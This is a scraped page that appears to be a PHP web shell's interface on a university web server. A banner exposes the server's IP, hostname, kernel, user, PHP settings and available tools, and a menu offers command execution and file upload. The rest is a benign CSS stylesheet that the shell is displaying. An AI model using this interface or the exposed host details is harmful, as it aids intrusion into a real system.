Server IP : 172.16.15.8 / Your IP : 3.138.135.4 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jkpicard/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
body{ font-family: Verdana, Geneva, Tahoma, sans-serif; background: linear-gradient(#98D78E, #E6F4E2); background-attachment: fixed; color: black; } nav{ display: flex; } nav ul{ display: flex; list-style-type: none; padding: 0; gap: 8px; align-items: center; } nav ul li{ display: flex; flex-wrap: wrap; list-style-type: none; border: 1px solid black; width: 150px; font-size: 10pt; border-radius: 10px; background-color: white; text-align: center; } nav ul li a{ display: block; text-align: center; padding: 5px; text-decoration: none; } a:visited{ color: blue; } nav ul li a:visited{ color: blue; } nav ul li a:active{ background-color: #CD8ED7; color: white; border-radius: 10px; } h1{ text-align: center; } table{ margin: 10px auto; } #assBox{ display: block; text-align: center; border: 1px solid black; width: 750px; height: auto; margin: 10px auto; padding: 8px; } #labBox{ display: block; text-align: center; border: 1px solid black; width: 450px; height: auto; margin: 10px auto; padding: 8px; } #dbBox{ display: block; text-align: center; border: 1px solid black; width: 250px; height: auto; margin: 10px auto; padding: 8px; } #wrapper{ padding: 10px; display: inline-block; border-radius: 5px; background-color: snow; border: 1px solid black; height: auto; width: 1200px; margin: auto; } .centered{ text-align: center; } .check{ height: 48px; width: 48px; } .navBar{ display: flex; margin: 5px; padding: 0px; } .nt{ display: block; } .textBox{ height: auto; width: 50px; } .together{ /*border: 1px solid red;*/ display: flex; padding: 8px; } .togetherLeft{ height: 48px; width: auto; } .togetherRight{ display: flex; } .align-left{ text-align: left; } .holder{ display: flex; justify-content: center; }